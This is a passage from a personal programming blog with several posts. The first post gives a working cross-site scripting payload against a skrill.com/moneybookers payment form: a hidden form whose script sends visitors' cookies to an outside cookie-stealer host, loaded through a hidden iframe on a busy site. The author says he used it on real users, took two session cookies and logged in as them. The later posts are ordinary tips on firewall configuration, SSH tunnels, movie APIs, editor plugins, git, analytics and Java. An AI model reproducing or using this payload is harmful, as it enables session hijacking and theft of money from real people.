Programming and more

XSS on payment form on skrill.com

I have been studying the wonderful world of hacking in the last months. A book I read, on pen-testing suggested looking at http://www.reddit.com/r/xss for news on xss, new methods, examples etc.

XSS is basically when you can insert some javascript code into a website.

I have never used reddit before, now I am hooked on it. I always thought of XSS a strange problem, didn’t understood how someone can attack your website or really do anything with xss, other than redirect users to another website or so, and to achieve that the XSS would have to be stored in a database or something, and displayed to other users.

Then I realized that XSS is one of the worse holes you can have on your website. One can use an xss attack to steal your cookies and basically be authorized and basically have access where you have access.

So today I saw that: http://www.reddit.com/r/xss/comments/2jea1h/xss_on_payment_form_skrill/

This was a brief skrill.com XSS vulerability. It was active for 24 hours. This guy found a form where input is not filtered.  Specifically




Is not filtered, so you can push javascript code into that website.
So how to exploit (I actually tried this and it worked).

You will have to create a form:

 <form id = "myform" action="https://www.moneybookers.com/app/payment.pl">
  <input type="hidden" name="pay_to_email" value="mesyre@gmail.com">
  <input type="hidden" name="language" value="EN">
  <input type="hidden" name="amount" value="3">
  <input type="hidden" name="currency" value="EUR">
  <input type="hidden" name="amount2_description" value="Product Price:">
  <input type="hidden" name="amount2" value="2">
  <input type="hidden" name="detail1_description" value="Product:">
  <input type="hidden" name="detail1_text"  value='test' class="col-md-9 col-xs-12"/>
  <input type="hidden" name="amount3_description" value="Product Price:">
  <input type="hidden" name="amount3" value="1">
  <input type="hidden" name="detail2_description" value="Product:">
  <input type="hidden" name="detail2_text" value="&quot;&gt;&lt;script language= &quot;JavaScript&quot;&gt;document.location=&quot;http://www.mysite.com/cookiestealer/index.php?cookie=&quot; + document.cookie;document.location=&quot;http://www.mysite.com&quot;&lt;/script&gt;">
    <input type="submit" value="h" class="col-md-3 col-xs-12"/>

Cookie stealer is a basic script (its included in the link above) Now because people don’t actually submit forms that don’t know, we add some javascript to auto submit the form:


And load it to some other (preferably hi-traffic website.

	<iframe width="0" height="0" src="http://www.mysite.com/xss.php"></iframe>

Then what happens: Every time someone gets into your website, you get their cookies. Then you visit skrill.com and use their cookies, and you are logged in as them.

I actually tried this. I left it online for 10 hours, in a high traffic website, I got 2 valid cookies, used them and logged in. I could easily sent the money to my account, Now actually being able to do that, is more important to me than actually stealing from the poor guys that I exploited, but it was sure the highlight of my hacking attempts. Its not every day that you can say you hacked skrill.com.

And it was all done with kindergarten-level knowledge in terms of hacking and some luck.

I always though that those wholes don’t exist anymore, especially in large websites. But I was wrong. Developers make mistakes every day.

This was online for a full day before they fixed it.

The life of the software developer in 7 minutes

If you are a software developer, you will cry after you see this!


How to fix: RESULT: csf will not function on this server due to FATAL errors from missing modules [4]

I tried to install CSF to a linux machine running Cpanel.

I got the error:

RESULT: csf will not function on this server due to FATAL errors from missing modules [4]

As it turns out this is an openVz issue. I found this little page explaining what to do:


I copy it here just in case this page disappear or something:

You do that on the HOST Operating System:

Modify IPTABLES_MODULES on /etc/sysconfig/iptables-config
IPTABLES_MODULES="ip_conntrack_netbios_ns ipt_conntrack ipt_LOG ipt_owner ipt_state ip_conntrack_ftp iptable_nat ip_nat_ftp ip_tables ipt_multiport iptable_filter ipt_limit"
then launch : service iptables restart
to restart iptables services
Then modify IPTABLES on /etc/vz/vz.conf
IPTABLES="ipt_REJECT ipt_tos ipt_limit ipt_multiport iptable_filter iptable_mangle ipt_TCPMSS ipt_tcpmss ipt_ttl ipt_length ipt_state iptable_nat ip_nat_ftp ip_tables ipt_conntrack ip_conntrack_ftp ipt_LOG ipt_owner"
then launch : /etc/init.d/vz restart

Movie information APIs for you

Hello and welcome,

I am thinking of creating some website for users to comment on movies. But since there are a lot of movies, there are 2 ways to get all the movie data:

  • Allow the users to insert their favorite movie and all their data,
  • Find some API and collect the information automatically.

I don’t like very much the first option. Users are generally ignorant and lazy and someone has to work full time to review everything. Since I only love creating sites and I hate sustaining them, I try to create my websites in such a way so that they work on their own.

So I have researched for APIS to give me movie information.

So far I found:


This one looks good, It has search functions and gets data from IMDB.com and rotten tomatoes. It is based on the imdb.com movie id.


Rotten Tomatoes API. Looks good


This one is based on series. Haven’t tried it but I mention it someone might like to do something involving tv shows.


Another movie and actors info API. One thing worth mentioning is that in their responses they include

"alternate_ids": {"imdb": "1403865"},

That is the IMDB id. That is useful when you already have some database with imdb ids (like me) or you want to mix info with other APIS that use the IMDB ids.


This one is about series, and it also has the TV schedules for GB CA or AU.

As you understand I haven’t reviewed them I just had a quick look. So if you tried any of those please write me a comment informing me what you liked and what not.

Thanks for visiting.

How to make notepad++ Functions List plugin to work with Windows 7

I use Notepad++ daily for PHP Development. I love it, it’s simple and powerful at the same time.

One good feature is the plugins that are available. One of them is Functions List.

If you try to install that plugin on a Windows 7 Machine, it will not work ok. You have to do some extra steps (found here).

1. Download Function List Plugin
2. Copy the files: C++.flb, FunctionListRules.xml, Gmod Lua.bmp to: [DRIVE LETTER]:\Users\[YOUR USER NAME]\AppData\Roaming\Notepad++\plugins\config
3. Copy the file FunctionList.dll to your instaltion folder for example: [DRIVE LETTER]:\Program Files (x86)\Notepad++\plugins

Another good tutorial to enhance the capabilities of this plugin for php is found here: http://www.danielkassner.com/2010/01/22/using-notepads-function-list-plugin-for-php-development

Redirect all windows traffic through ssh tunnel – socks proxy – http proxy

So you have build an ssh tunnel http://www.r00t.gr/how-to-easily-create-a-ssh-tunnel-using-windows-in-startup-boot/ and you want to redict all you traffic through it. You can configure all browsers and email clients and utorent to use the proxy, or you can download proxifier http://www.proxifier.com/download.htm and set it up to use one proxy. It’s really cheap, 40$ for a lifetime licence.

Cool tools like that, I don’t mind paying for!

I use that trick on my personal computers to encrypt all my traffic through one of my dedicated servers

How to easily create a ssh tunnel using windows in startup (boot)

I like encryption much. You might not know this, but you ISP’s log everything you do on the web by law in most countries.

I don’t like someone else having access to my emails and the list of websites that I use.

I know for a long time about ssh magic and all the spells you can do with it. One of them is, you create a tunnel, with a remote server, and you set up a “tunnel”, then you configure all traffic go from that tunnel.

This great free program, myentunnel you can download it here: http://nemesis2.qx.net/pages/MyEnTunnel creates the connection for you, and i you want automatically on boot.

Of cource you need ssh access to ANY remote server. Anything will do. VPS dedicated server or some other persons house.

Take a look at the settings:

ssh settings

Then you can go to firefox and setup a proxy that uses localhost port: 1234

Then everything is redirected through your ssh connection, and the best part is that all traffic is encrypted.

How to install git on centos with yum

# Add the repository
rpm -Uvh http://repo.webtatic.com/yum/centos/5/latest.rpm
# Install the latest version of git
yum install --enablerepo=webtatic git-all

Clean, simple and it works!

How to make google analytics work with jquery mobile site

Google analytics doesn’t work with jquery mobile websites. Luckily, I found the way to make this work.

Basically you have to break the code into 2 parts:

    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-xxxxxx-xx']);
    (function() {
      var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
$('[data-role=page]').live('pageshow', function (event, ui) {
    try {
        hash = location.hash;
        if (hash && hash.length > 1) {
            _gaq.push(['_trackPageview', hash.substr(1)]);
        } else {
    } catch(err) {

Just copy your id from the usual anayltics code and input it in: UA-xxxxxx-xx

More info here and here

How to filter a string and keep only numbers with java

Just run this code:


str = str.replaceAll("[^0-9]+","");

This means: replace everything that is not number with empty string (“”)